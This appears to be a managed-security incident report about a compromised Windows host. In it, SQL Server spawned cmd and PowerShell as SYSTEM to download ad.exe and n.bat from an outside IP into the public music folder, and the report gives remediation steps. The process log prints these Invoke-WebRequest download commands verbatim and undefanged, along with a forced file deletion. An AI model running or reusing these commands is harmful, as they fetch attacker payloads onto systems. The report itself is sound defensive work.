Investigative Summary
---------------------
[WARNING]
Please review this incident report to understand what was identified before remediating. There may be unknown malicious processes, files, or other changes made to the host that remain undetected. Restoring from a known good backup or clean OS install is the only way to ensure a complete host-level remediation. 

Evidence suggests that at approximately 2025-02-03 23:14:59 UTC host 'ABSRDS' had ad[.]exe and n[.]bat download to the public music folder. They downloaded from the url hxxp[://]87[.]121[.]86[.]35. 

Unfortunately the host went offline and Huntress was unable to assess the files. If the host can be brought back online and a support ticket sent through we will be able to assess the files. Currently Huntress recommends blocking the url and auditing the music file for files that are not expected to be there. 




Remediation Instructions
------------------------
Kill Process
	- Path - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	- Pid - 6880
	- Path - C:\Windows\system32\cmd.exe
	- Pid - 11704
	- Path - C:\Windows\system32\cmd.exe
	- Pid - 11844
	- Path - C:\Windows\system32\cmd.exe
	- Pid - 6008
	- Path - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	- Pid - 8392
- Block URL hxxp[://]87[.]121[.]86[.]35
- Audit the c:\users\public\music folder for files that are not expected to be there. 
- Bring host online and assess the files ad[.]exe and n[.]bat. 
- Alternatively submit a support ticket so the SOC can asses the files while the host is online

Processes
---------
Start Time: 2025-02-03 23:16:11 UTC
Command: powershell  Invoke-WebRequest -Uri "http://87.121.86.35/n.bat" -OutFile "c:\users\public\music\n.bat"
Executable: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process ID: eb09d3dd-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:16:11 UTC
Command: "C:\Windows\system32\cmd.exe" /c powershell Invoke-WebRequest -Uri "http://87.121.86.35/n.bat" -OutFile "c:\users\public\music\n.bat"
Executable: C:\Windows\system32\cmd.exe
Process ID: eb09d3d6-e283-11ef-a39a-00155d014102
Parent Process: D:\Program Files\Microsoft SQL Server\MSSQL13.FOUNDATION\MSSQL\Binn\sqlservr.exe
User: SYSTEM

Start Time: 2025-02-03 23:16:09 UTC
Command: "C:\Windows\system32\cmd.exe" /c powershell Invoke-WebRequest -Uri "http://87.121.86.35/ad.exe" -OutFile "c:\users\public\music\ad.exe"
Executable: C:\Windows\system32\cmd.exe
Process ID: eb09d3c2-e283-11ef-a39a-00155d014102
Parent Process: D:\Program Files\Microsoft SQL Server\MSSQL13.FOUNDATION\MSSQL\Binn\sqlservr.exe
User: SYSTEM

Start Time: 2025-02-03 23:16:11 UTC
Command: powershell  Invoke-WebRequest -Uri "http://87.121.86.35/n.bat" -OutFile "c:\users\public\music\n.bat"
Executable: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process ID: eb09d3dd-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:13:43 UTC
Command: "C:\Windows\system32\cmd.exe" /c del /f "c:\users\public\music\FODsOZKgAU.txt"
Executable: C:\Windows\system32\cmd.exe
Process ID: eb09d14e-e283-11ef-a39a-00155d014102
Parent Process: D:\Program Files\Microsoft SQL Server\MSSQL13.FOUNDATION\MSSQL\Binn\sqlservr.exe
User: SYSTEM

Start Time: 2025-02-03 23:16:10 UTC
Command: powershell  Invoke-WebRequest -Uri "http://87.121.86.35/ad.exe" -OutFile "c:\users\public\music\ad.exe"
Executable: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process ID: eb09d3c8-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:16:09 UTC
Command: "C:\Windows\system32\cmd.exe" /c powershell Invoke-WebRequest -Uri "http://87.121.86.35/ad.exe" -OutFile "c:\users\public\music\ad.exe"
Executable: C:\Windows\system32\cmd.exe
Process ID: eb09d3c2-e283-11ef-a39a-00155d014102
Parent Process: D:\Program Files\Microsoft SQL Server\MSSQL13.FOUNDATION\MSSQL\Binn\sqlservr.exe
User: SYSTEM

Start Time: 2025-02-03 23:13:43 UTC
Command: "C:\Windows\system32\cmd.exe" /c del /f "c:\users\public\music\FODsOZKgAU.txt"
Executable: C:\Windows\system32\cmd.exe
Process ID: eb09d14e-e283-11ef-a39a-00155d014102
Parent Process: D:\Program Files\Microsoft SQL Server\MSSQL13.FOUNDATION\MSSQL\Binn\sqlservr.exe
User: SYSTEM

Start Time: 2025-02-03 23:16:11 UTC
Command: "C:\Windows\system32\cmd.exe" /c powershell Invoke-WebRequest -Uri "http://87.121.86.35/n.bat" -OutFile "c:\users\public\music\n.bat"
Executable: C:\Windows\system32\cmd.exe
Process ID: eb09d3d6-e283-11ef-a39a-00155d014102
Parent Process: D:\Program Files\Microsoft SQL Server\MSSQL13.FOUNDATION\MSSQL\Binn\sqlservr.exe
User: SYSTEM

Start Time: 2025-02-03 23:16:09 UTC
Command: "C:\Windows\system32\cmd.exe" /c powershell Invoke-WebRequest -Uri "http://87.121.86.35/ad.exe" -OutFile "c:\users\public\music\ad.exe"
Executable: C:\Windows\system32\cmd.exe
Process ID: eb09d3c2-e283-11ef-a39a-00155d014102
Parent Process: D:\Program Files\Microsoft SQL Server\MSSQL13.FOUNDATION\MSSQL\Binn\sqlservr.exe
User: SYSTEM

Start Time: 2025-02-03 23:16:10 UTC
Command: powershell  Invoke-WebRequest -Uri "http://87.121.86.35/ad.exe" -OutFile "c:\users\public\music\ad.exe"
Executable: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process ID: eb09d3c8-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:16:11 UTC
Command: powershell  Invoke-WebRequest -Uri "http://87.121.86.35/n.bat" -OutFile "c:\users\public\music\n.bat"
Executable: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process ID: eb09d3dd-e283-11ef-a39a-00155d014102
Parent Process: C:\Windows\system32\cmd.exe
User: SYSTEM

Start Time: 2025-02-03 23:16:09 UTC
Command: "C:\Windows\system32\cmd.exe" /c powershell Invoke-WebRequest -Uri "http://87.121.86.35/ad.exe" -OutFile "c:\users\public\music\ad.exe"
Executable: C:\Windows\system32\cmd.exe
Process ID: eb09d3c2-e283-11ef-a39a-00155d014102
Parent Process: D:\Program Files\Microsoft SQL Server\MSSQL13.FOUNDATION\MSSQL\Binn\sqlservr.exe
User: SYSTEM
